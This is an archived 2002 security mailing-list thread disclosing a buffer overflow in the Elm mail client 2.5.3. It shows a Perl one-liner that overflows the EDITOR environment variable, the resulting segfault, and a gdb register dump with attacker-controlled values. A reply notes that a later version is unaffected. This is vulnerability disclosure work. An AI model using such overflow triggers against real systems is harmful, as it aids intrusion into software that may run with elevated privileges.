Re: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.)

From: Ehud Tenenbaum (analyzerat_private)
Date: Tue Feb 26 2002 - 00:43:04 PST

Next message: John Compton: "SSH2 Exploit?"

Previous message: Syzop: "Re: Unreal ircd Format String Vuln"
In reply to: SecurITeam BugTraq Monitoring: "Re: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hey,

Elm Version and Identification Information:
 
        Elm 2.5 PL3, of January 11, 2000
        (C) Copyright 1988-1999 USENET Community Trust
        Based on Elm 2.0, (C) Copyright 1986,1987 Dave Taylor      

this is the one we made the tests on.

Sincerely,
2xs Security team.

SecurITeam BugTraq Monitoring wrote:
> 
> Hi,
> 
> Elm 2.5 PL6, of August 7, 2001 isn't affected as you can see:
> # export EDITOR=`perl -e 'print "A" x 2000;'`
> 
> # elm
> 
> Notice:  ELM requires an ".elm" subdirectory off your home directory
> to hold information such as your configuration preferences (the
> "elmrc" file) and aliases.
> 
> May I create this directory for you (yes/no/quit) ? [y] : n
> Very well, but you may run into difficulties later.
> 
> Nothing happens
> 
> I don't think my version is old enough to manifest this vulnerability.
> 
> Thanks
> Noam Rathaus
> http://www.SecurITeam.com
> http://www.BeyondSecurity.com
> 
> ----- Original Message -----
> From: "Ehud Tenenbaum" <analyzerat_private>
> To: <vuln-devat_private>
> Sent: Sunday, February 24, 2002 08:45
> Subject: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other
> OS.)
> 
> > Hey,
> >
> > 2xs Security team found new bug in elm, although its not suid
> > on linux systems(redhat 6.2, mandrak 8.0, slackware 7.1) we
> > believe its suid on other kind of *nix OS such as HP-UX
> >
> > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ id
> > uid=100(w00p) gid=100(users) groups=100(users)
> > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$
> >
> > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ export EDITOR=`perl -e 'print "A"
> > x 2000;'`
> > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ elm
> >
> > Notice:  ELM requires an ".elm" subdirectory off your home directory
> > to hold information such as your configuration preferences (the
> > "elmrc" file) and aliases.
> >
> > May I create this directory for you (yes/no/quit) ? [y] : n
> > Segmentation fault
> > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$
> >
> > w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ gdb ./elm
> > GNU gdb 5.0
> > Copyright 2000 Free Software Foundation, Inc.
> > GDB is free software, covered by the GNU General Public License, and you
> > are
> > welcome to change it and/or distribute copies of it under certain
> > conditions.
> > Type "show copying" to see the conditions.
> > There is absolutely no warranty for GDB.  Type "show warranty" for
> > details.
> > This GDB was configured as "i386-slackware-linux"...
> > (gdb) r
> > Starting program: /tmp/w00p/elm2.5.3/bin/./elm
> > warning: Unable to find dynamic linker breakpoint function.
> > GDB will be unable to debug shared library initializers
> > and track explicitly loaded dynamic code.
> >
> > Notice:  ELM requires an ".elm" subdirectory off your home directory
> > to hold information such as your configuration preferences (the
> > "elmrc" file) and aliases.
> >
> > May I create this directory for you (yes/no/quit) ? [y] : n
> >
> > Program received signal SIGSEGV, Segmentation fault.
> > 0x40074486 in catgets () from /lib/libc.so.6
> > (gdb) where
> > #0  0x40074486 in catgets () from /lib/libc.so.6
> > #1  0x805b6a6 in create_private_dir ()
> > #2  0x805b3fc in initialize ()
> > #3  0x80520bd in main ()
> > #4  0x4006faa7 in __libc_start_main () from /lib/libc.so.6
> > (gdb) info registers
> > eax            0x41414141       1094795585
> > ecx            0x40014000       1073823744
> > edx            0x0      0
> > ebx            0x4013bed4       1075035860
> > esp            0xbfffeca0       0xbfffeca0
> > ebp            0xbfffecb4       0xbfffecb4
> > esi            0x41414141       1094795585
> > edi            0xbffff264       -1073745308
> > eip            0x40074486       0x40074486
> > eflags         0x10202  66050
> > cs             0x23     35
> > ss             0x2b     43
> > ds             0x2b     43
> > es             0x2b     43
> > fs             0x0      0
> > gs             0x0      0
> > fctrl          0x37f    895
> > fstat          0x0      0
> > ftag           0xffff   65535
> > fiseg          0x0      0
> > fioff          0x0      0
> > foseg          0x0      0
> > fooff          0xbffff8a4       -1073743708
> > fop            0x0      0
> > (gdb)
> >
> > Bug was found with BOS, Binary Overflow Scanner tool made
> > by 2xs Security team.
> >
> > At this point we shall not release an exploit.
> > For Questions or Comments:
> >
> > Ehud Tenenbaum <analyzerat_private> CTO & Project manager.
> > Izik Kotler <izikat_private> Senior programmer.
> > Mixter <mixterat_private> Senior programmer.
> > acz <aczat_private> QA/Programmer.
> >
> > --
> > ------------
> > Ehud Tenenbaum
> > C.T.O & Project Manager
> > 2xs LTD.
> > Tel: 972-9-9519980
> > Fax: 972-9-9519982
> > E-Mail: ehudat_private
> > ------------
> >                                  Have A Safe Day
> >

-- 
------------
Ehud Tenenbaum
C.T.O & Project Manager 
2xs LTD. 
Tel: 972-9-9519980
Fax: 972-9-9519982
E-Mail: ehudat_private
------------ 
                                 Have A Safe Day

Next message: John Compton: "SSH2 Exploit?"
Previous message: Syzop: "Re: Unreal ircd Format String Vuln"
In reply to: SecurITeam BugTraq Monitoring: "Re: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Feb 26 2002 - 02:22:27 PST